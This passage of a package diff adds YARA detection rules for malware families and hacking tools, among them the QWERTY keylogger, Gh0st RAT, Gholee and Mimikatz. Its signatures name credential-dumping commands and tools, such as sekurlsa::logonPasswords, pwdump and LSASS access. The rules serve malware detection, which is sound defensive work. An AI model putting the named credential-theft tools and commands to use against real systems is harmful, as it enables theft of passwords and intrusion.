+        $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
+        $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
+
+        //$versions1 = /(f)inspyv2/ nocase
+        //$versions2 = /(f)inspyv4/ nocase
+
+        $bootkit1 = /(b)ootkit_x32driver/
+        $bootkit2 = /(b)ootkit_x64driver/
+
+        $typo1 = /(S)creenShort Recording/ wide
+
+        $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
+
+    condition:
+        (8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or $driver or any of ($janedow*) or any of ($bootkit*) or $typo1 or $mssounddx) and not any of ($filter*)
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/FiveEyes.yara remnux-rules-0.0.4/yara.old/FiveEyes.yara
--- remnux-rules-0.0.3/yara.old/FiveEyes.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/FiveEyes.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,241 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+/* FIVE EYES ------------------------------------------------------------------------------- */
+
+rule FiveEyes_QUERTY_Malwareqwerty_20121 {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20121.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
+	strings:
+		$s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20121.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
+	condition:
+		9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_sys {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
+	strings:
+		$s0 = "20123.dll" fullword ascii
+		$s1 = "kbdclass.sys" fullword wide
+		$s2 = "IoFreeMdl" fullword ascii
+		$s3 = "ntoskrnl.exe" fullword ascii
+		$s4 = "KfReleaseSpinLock" fullword ascii
+	condition:
+		all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_cmdDef {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
+	strings:
+		$s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
+		$s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
+		$s2 = "<commands/>" fullword ascii
+		$s3 = "</version>" fullword ascii
+		$s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
+		$s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
+		$s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
+		$s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
+		$s8 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s9 = "<minorType>0</minorType>" fullword ascii
+		$s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
+		$s11 = "</comments>" fullword ascii
+		$s12 = "<comments>" fullword ascii
+		$s13 = "<majorType>1</majorType>" fullword ascii
+		$s14 = "<files>None</files>" fullword ascii
+		$s15 = "<poc>Erebus</poc>" fullword ascii
+		$s16 = "</plugin>" fullword ascii
+		$s17 = "<team>None</team>" fullword ascii
+		$s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
+		$s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
+		$s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
+	condition:
+		14 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_dll {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "89504d91c5539a366e153894c1bc17277116342b"
+	strings:
+		$s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
+		$s1 = "20121.dll" fullword ascii
+	condition:
+		all of them
+}
+rule FiveEyes_QUERTY_Malwareqwerty_20123 {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20123.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
+	strings:
+		$s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
+		$s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
+		$s2 = "<name>20123.sys</name>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
+		$s5 = "<platform type=\"1\">" fullword ascii
+		$s6 = "</plugin>" fullword ascii
+		$s7 = "</pluginConfig>" fullword ascii
+		$s8 = "<pluginConfig>" fullword ascii
+		$s9 = "</platform>" fullword ascii
+		$s10 = "</lpConfig>" fullword ascii
+		$s11 = "<lpConfig>" fullword ascii
+	condition:
+		9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20120_dll {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
+	strings:
+		$s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" fullword wide
+		$s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" fullword wide
+		$s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
+		$s3 = "- Log Used (number of windows) - %d" fullword wide
+		$s4 = "- Log Limit (number of windows) - %d" fullword wide
+		$s5 = "Process or User Default Language" fullword wide
+		$s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
+		$s7 = "- Logging of keystrokes is switched ON" fullword wide
+		$s8 = "- Logging of keystrokes is switched OFF" fullword wide
+		$s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
+		$s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
+		$s11 = "FAILED to get Qwerty Status" fullword wide
+		$s12 = "- Successfully retrieved Log from Implant." fullword wide
+		$s13 = "- Logging of all Windows is toggled ON" fullword wide
+		$s14 = "- Logging of all Windows is toggled OFF" fullword wide
+		$s15 = "Qwerty FAILED to retrieve window list." fullword wide
+		$s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide
+		$s17 = "The implant failed to return a valid status" fullword ascii
+		$s18 = "- Log files were NOT generated!" fullword wide
+		$s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
+		$s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
+	condition:
+		10 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20120_cmdDef {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
+	strings:
+		$s0 = "This PPC gets the current keystroke log." fullword ascii
+		$s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
+		$s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
+		$s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
+		$s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
+		$s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
+		$s6 = "<name>Get Keystroke Log</name>" fullword ascii
+		$s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
+		$s8 = "<definition>display help for this function</definition>" fullword ascii
+		$s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
+		$s10 = "Set the log limit (in number of windows)" fullword ascii
+		$s11 = "<example>qwgetlog</example>" fullword ascii
+		$s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
+		$s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
+		$s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
+		$s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
+		$s16 = "<command id=\"32\">" fullword ascii
+		$s17 = "<command id=\"3\">" fullword ascii
+		$s18 = "<command id=\"7\">" fullword ascii
+		$s19 = "<command id=\"1\">" fullword ascii
+		$s20 = "<command id=\"4\">" fullword ascii
+	condition:
+		10 of them
+}
+
+rule FiveEyes_QUERTY_Malwareqwerty_20120 {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20120.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "597082f05bfd3225587d480c30f54a7a1326a892"
+	strings:
+		$s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
+		$s1 = "<name>20120.dll</name>" fullword ascii
+		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+		$s4 = "<platform type=\"1\">" fullword ascii
+		$s5 = "</plugin>" fullword ascii
+		$s6 = "</pluginConfig>" fullword ascii
+		$s7 = "<pluginConfig>" fullword ascii
+		$s8 = "</platform>" fullword ascii
+		$s9 = "</lpConfig>" fullword ascii
+		$s10 = "<lpConfig>" fullword ascii
+	condition:
+		all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_cmdDef {
+	meta:
+		description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
+		author = "Florian Roth"
+		reference = "http://www.spiegel.de/media/media-35668.pdf"
+		date = "2015/01/18"
+		hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
+	strings:
+		$s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
+		$s1 = "<message>Failed to get File Time</message>" fullword ascii
+		$s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
+		$s3 = "<message>Failed to set File Time</message>" fullword ascii
+		$s4 = "</commands>" fullword ascii
+		$s5 = "<commands>" fullword ascii
+		$s6 = "</version>" fullword ascii
+		$s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
+		$s8 = "<message>No Comms. with Driver</message>" fullword ascii
+		$s9 = "</error>" fullword ascii
+		$s10 = "<message>Invalid File Size</message>" fullword ascii
+		$s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
+		$s12 = "<message>File Size Mismatch</message>" fullword ascii
+		$s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
+		$s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
+		$s15 = "<dllDepend>None</dllDepend>" fullword ascii
+		$s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
+		$s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
+		$s18 = "<minorType>0</minorType>" fullword ascii
+		$s19 = "<code>00001002</code>" fullword ascii
+		$s20 = "<code>00001001</code>" fullword ascii
+	condition:
+		12 of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/FlyingKitten.yara remnux-rules-0.0.4/yara.old/FlyingKitten.yara
--- remnux-rules-0.0.3/yara.old/FlyingKitten.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/FlyingKitten.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FlyingKitten : rat
+{
+    meta:
+        Author      = "CrowdStrike, Inc"
+        Date        = "2014/05/13"
+        Description = "Flying Kitten RAT"
+        Reference   = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"
+
+    strings:
+        $classpath = "Stealer.Properties.Resources.resources"
+        $pdbstr = "\\Stealer\\obj\\x86\\Release\\Stealer.pdb"
+
+    condition:
+        all of them and uint16(0) == 0x5A4D and uint32(uint32(0x3c)) == 0x4550 and uint16(uint32(0x3C) + 0x16) & 0x2000 == 0 and ((uint16(uint32(0x3c)+24) == 0x010b and uint32(uint32(0x3c)+232) > 0) or (uint16(uint32(0x3c)+24) == 0x020b and uint32(uint32(0x3c)+248) > 0)) 
+
+}
+
+rule CSIT_14003_03 : installer
+{ 
+    meta:
+        Author      = "CrowdStrike, Inc"
+        Date        = "2014/05/13"
+        Description = "Flying Kitten Installer"
+        Reference   = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"
+
+    strings:
+        $exename = "IntelRapidStart.exe"
+        $confname = "IntelRapidStart.exe.config"
+        $cabhdr = { 4d 53 43 46 00 00 00 00 } 
+
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Gh0st.yara remnux-rules-0.0.4/yara.old/Gh0st.yara
--- remnux-rules-0.0.3/yara.old/Gh0st.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Gh0st.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,70 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_WIN_Gh0st_ver
+{
+meta:
+   author = "@BryanNolen"
+   date = "2012-12"
+   type = "APT"
+   version = "1.1"
+   ref = "Detection of Gh0st RAT server DLL component"
+   ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf"
+ strings:  
+   $library = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly"
+   $capability = "GetClipboardData"
+   $capability1 = "capCreateCaptureWindowA"
+   $capability2 = "CreateRemoteThread"
+   $capability3 = "WriteProcessMemory"
+   $capability4 = "LsaRetrievePrivateData"
+   $capability5 = "AdjustTokenPrivileges"
+   $function = "ResetSSDT"
+   $window = "WinSta0\\Default"
+   $magic = {47 6C 6F 62 61 6C 5C [5-9] 20 25 64}    /* $magic = "Gh0st" */
+ condition:
+   all of them
+}
+
+rule Gh0st
+{
+    meta:
+        description = "Gh0st"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $ = /(G)host/
+        $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/
+        $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/
+        $ = /(%)s\\shell\\open\\command/
+        $ = /(G)etClipboardData/
+        $ = /(W)riteProcessMemory/
+        $ = /(A)djustTokenPrivileges/
+        $ = /(W)inSta0\\Default/
+        $ = /(#)32770/
+        $ = /(#)32771/
+        $ = /(#)32772/
+        $ = /(#)32774/
+
+    condition:
+        all of them
+}
+
+rule gh0st
+
+{
+
+meta:
+	author = "https://github.com/jackcr/"
+
+   strings:
+      $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C }
+      $b = "Gh0st Update"
+
+   condition:
+      any of them
+
+}
diff -Nru remnux-rules-0.0.3/yara.old/Gholee.yara remnux-rules-0.0.4/yara.old/Gholee.yara
--- remnux-rules-0.0.3/yara.old/Gholee.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Gholee.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,107 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule gholeeV1
+{
+    meta:
+	 Author = "@GelosSnake"
+    	 Date = "2014/08"
+    	 Description = "Gholee first discovered variant "
+	 Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" 
+
+    strings:
+    	 $a = "sandbox_avg10_vc9_SP1_2011"
+    	 $b = "gholee"
+
+    condition:
+    	 all of them
+}
+
+rule gholeeV2
+{
+   meta:
+	Author = "@GelosSnake"
+	Date = "2015-02-12"
+    	Description = "Gholee first discovered variant "
+	Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" 
+
+   strings:
+	$string0 = "RichHa"
+	$string1 = "         (((((                  H" wide
+	$string2 = "1$1,141<1D1L1T1\\1d1l1t1"
+	$string3 = "<8;$O' "
+	$string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
+	$string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
+	$string6 = "urn:schemas-microsoft-com:asm.v1"
+	$string7 = "8.848H8O8i8s8y8"
+	$string8 = "wrapper3" wide
+	$string9 = "pwwwwwwww"
+	$string10 = "Sunday"
+	$string11 = "YYuTVWh"
+	$string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
+	$string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
+	$string15 = "wrapper3 Version 1.0" wide
+	$string16 = "77A779"
+	$string17 = "<C<G<M<R<X<"
+	$string18 = "9 9-9N9X9s9"
+
+    condition:
+	18 of them
+}
+
+rule MW_gholee_v1 : v1
+{
+meta:
+    Author = "@GelosSnake"
+    description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
+    date = "2014-08"
+    maltype = "Remote Access Trojan"
+    sample_filetype = "dll"
+    hash0 = "48573a150562c57742230583456b4c02"
+   
+strings:
+    $a = "sandbox_avg10_vc9_SP1_2011"
+    $b = "gholee"
+   
+condition:
+    all of them
+}
+ 
+rule MW_gholee_v2 : v2
+{
+meta:
+        author = "@GelosSnake"
+        date = "2015-02-12"
+        description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
+        hash0 = "05523761ca296ec09afdf79477e5f18d"
+        hash1 = "08e424ac42e6efa361eccefdf3c13b21"
+        hash2 = "5730f925145f1a1cd8380197e01d9e06"
+        hash3 = "73461c8578dd9ab86d42984f30c04610"
+        sample_filetype = "dll"
+strings:
+        $string0 = "RichHa"
+        $string1 = "         (((((                  H" wide
+        $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
+        $string3 = "<8;$O' "
+        $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
+        $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
+        $string6 = "urn:schemas-microsoft-com:asm.v1"
+        $string7 = "8.848H8O8i8s8y8"
+        $string8 = "wrapper3" wide
+        $string9 = "pwwwwwwww"
+        $string10 = "Sunday"
+        $string11 = "YYuTVWh"
+        $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
+        $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
+        $string15 = "wrapper3 Version 1.0" wide
+        $string16 = "77A779"
+        $string17 = "<C<G<M<R<X<"
+        $string18 = "9 9-9N9X9s9"
+condition:
+        18 of them
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Glasses.yara remnux-rules-0.0.4/yara.old/Glasses.yara
--- remnux-rules-0.0.3/yara.old/Glasses.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Glasses.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule GlassesCode : Glasses Family 
+{
+    meta:
+        description = "Glasses code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-22"
+        
+    strings:
+        $ = { B8 AB AA AA AA F7 E1 D1 EA 8D 04 52 2B C8 }
+        $ = { B8 56 55 55 55 F7 E9 8B 4C 24 1C 8B C2 C1 E8 1F 03 D0 49 3B CA }
+        
+    condition:
+        any of them
+}
+
+rule GlassesStrings : Glasses Family
+{
+    meta:
+        description = "Strings used by Glasses"
+        author = "Seth Hardy"
+        last_modified = "2014-07-22"
+        
+    strings:
+        $ = "thequickbrownfxjmpsvalzydg"
+        $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)"
+        $ = "\" target=\"NewRef\"></a>"
+ 
+    condition:
+        all of them
+
+}
+
+rule Glasses : Family
+{
+    meta:
+        description = "Glasses family"
+        author = "Seth Hardy"
+        last_modified = "2014-07-22"
+   
+    condition:
+        GlassesCode or GlassesStrings
+        
+}
diff -Nru remnux-rules-0.0.3/yara.old/Grozlex.yara remnux-rules-0.0.4/yara.old/Grozlex.yara
--- remnux-rules-0.0.3/yara.old/Grozlex.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Grozlex.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Grozlex : Stealer
+{
+	meta:
+		author="Kevin Falcoz"
+		date="20/08/2013"
+		description="Grozlex Stealer - Possible HCStealer"
+		
+	strings:
+		$signature={4C 00 6F 00 67 00 73 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 65 00 64 00 20 00 62 00 79 00 20 00 69 00 43 00 6F 00 7A 00 65 00 6E}
+	
+	condition:
+		$signature
+}
diff -Nru remnux-rules-0.0.3/yara.old/HackTools.yara remnux-rules-0.0.4/yara.old/HackTools.yara
--- remnux-rules-0.0.3/yara.old/HackTools.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/HackTools.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,3241 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule PwDump
+{
+	meta:
+		description = "PwDump 6 variant"
+		author = "Marc Stroebel"
+		date = "2014-04-24"
+		score = 70
+	strings:
+		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
+		$s6 = "Unable to query service status. Something is wrong, please manually check the st"
+		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
+	condition:
+		all of them
+}
+
+rule PScan_Portscan_1 {
+	meta:
+		description = "PScan - Port Scanner"
+		author = "F. Roth"
+		score = 50
+	strings:
+		$a = "00050;0F0M0X0a0v0}0"
+		$b = "vwgvwgvP76"
+		$c = "Pr0PhOFyP"
+		condition:
+		all of them
+}
+
+rule HackTool_Samples {
+	meta: 
+		description = "Hacktool"
+		score = 50
+	strings:
+		$a = "Unable to uninstall the fgexec service"
+		$b = "Unable to set socket to sniff"
+		$c = "Failed to load SAM functions"
+		$d = "Dump system passwords"
+		$e = "Error opening sam hive or not valid file"
+		$f = "Couldn't find LSASS pid"
+		$g = "samdump.dll"
+		$h = "WPEPRO SEND PACKET"
+		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
+		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
+		$k = "arpspoof\\Debug"
+		$l = "Success: The log has been cleared"
+		$m = "clearlogs [\\\\computername"
+		$n = "DumpUsers 1."
+		$o = "dictionary attack with specified dictionary file"
+		$p = "by Objectif Securite"
+		$q = "objectif-securite"
+		$r = "Cannot query LSA Secret on remote host"
+		$s = "Cannot write to process memory on remote host"
+		$t = "Cannot start PWDumpX service on host"
+		$u = "usage: %s <system hive> <security hive>"
+		$v = "username:domainname:LMhash:NThash"
+		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
+		$x = "Impersonation Tokens Available"
+		$y = "failed to parse pwdump format string"
+		$z = "Dumping password"
+	condition: 
+		1 of them
+}
+
+rule HackTool_Producers {
+	meta: description = "Hacktool Producers String" threat_level = 5 score = 50
+	strings:
+	$a1 = "www.oxid.it"
+	$a2 = "www.analogx.com"
+	$a3 = "ntsecurity.nu"
+	$a4 = "gentilkiwi.com"
+	$a6 = "Marcus Murray"
+	$extension = /extension: \.(ini|xml)\n/
+	condition: 1 of ($a*) and not $extension
+}
+
+/* Mimikatz */
+
+rule Mimikatz_Memory_Rule_1 : APT {
+	meta: 
+		author = "Florian Roth"
+		date = "12/22/2014"
+		score = 70
+		type = "memory"
+		description = "Detects password dumper mimikatz in memory"
+	strings:
+		$s1 = "sekurlsa::msv" fullword ascii
+	    $s2 = "sekurlsa::wdigest" fullword ascii
+	    $s4 = "sekurlsa::kerberos" fullword ascii
+	    $s5 = "sekurlsa::tspkg" fullword ascii
+	    $s6 = "sekurlsa::livessp" fullword ascii
+	    $s7 = "sekurlsa::ssp" fullword ascii
+	    $s8 = "sekurlsa::logonPasswords" fullword ascii
+	    $s9 = "sekurlsa::process" fullword ascii
+	    $s10 = "ekurlsa::minidump" fullword ascii
+	    $s11 = "sekurlsa::pth" fullword ascii
+	    $s12 = "sekurlsa::tickets" fullword ascii
+	    $s13 = "sekurlsa::ekeys" fullword ascii
+	    $s14 = "sekurlsa::dpapi" fullword ascii
+	    $s15 = "sekurlsa::credman" fullword ascii
+	condition:
+		1 of them
+}
+
+rule Mimikatz_Memory_Rule_2 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a memory dump"
+		author = "Florian Roth - Florian Roth"
+		type = "memory"
+		score = 80
+	strings:
+		$s0 = "sekurlsa::" ascii
+		$x1 = "cryptprimitives.pdb" ascii
+		$x2 = "Now is t1O" ascii fullword
+		$x4 = "ALICE123" ascii
+		$x5 = "BOBBY456" ascii
+	condition:
+		$s0 and 1 of ($x*)
+}
+
+rule Mimikatz_SampleSet_1 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash1 = "9ef9762169e8b44d01613234927f44d6"
+		hash2 = "35b34bb9f1ad0fdf48dc090ed4a8190f"	
+		hash3 = "516fde1fe06f96a019c3ad063c78b760"
+		hash4 = "faf248ee5184b65d28786d91c02864a6"
+		hash5 = "5847659129c4e711809ab5b6ab1b8bd8"
+		score = 80
+	strings:
+		$s0 = "mimikatz_trunk/Win32/mimidrv.sys" fullword
+		$s1 = "Mimikatz 2.0\\x64\\mimidrv.sys" fullword
+		$s2 = "32\\kelloworld.dll"
+		$s3 = "64\\kelloworld.dll"
+		$s4 = "32/kelloworld.dll"
+		$s5 = "64/kelloworld.dll"
+		$s6 = "mimidrv.sys" fullword
+		$s7 = "sekurlsa.lib" fullword
+		$s8 = "mimilib.dll" fullword
+		$s9 = "mimikatz.exe" fullword
+	condition:
+		3 of them
+}
+rule Mimikatz_SampleSet_2 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash = "6f14b6744aad66ac017ab7733cdb51ad"
+		score = 50
+	strings:
+		$s0 = "notsupported" fullword
+		$s1 = "getKerberos" fullword
+		$s2 = "M(knN0123456789abcdefghijklmnopqrstuvwxyz" fullword
+		$s3 = "getLiveSSPFunctions" fullword
+		$s4 = "getKerberosFunctions" fullword
+		$s5 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
+		$s6 = ".?AV_System_error@std@@" fullword
+		$s7 = "getCredmanFunctions" fullword
+		$s8 = "find_tokens" fullword
+	condition:
+		all of them
+}
+
+rule Mimikatz_SampleSet_3 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash = "f62848e3cd2f0316608c2696c6504b4a"
+		score = 50
+	strings:
+		$s8 = "x64/intra.kirbi" fullword
+		$s9 = "x64/intra.kirbi*kb" fullword
+	condition:
+		all of them
+}
+
+rule Mimikatz_SampleSet_4 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a big Mimikatz sample set"
+		author = "Florian Roth - Florian Roth"
+		hash1 = "8991aeef8b33049c5997c59afcea4a27"
+		hash2 = "a3e00b039f2d2ea04a4274506dd83be0"
+		hash3 = "cb5d40cc8db79c3d24f20f443f7e5926"
+		score = 40
+	strings:
+		$s0 = "notsupported" fullword
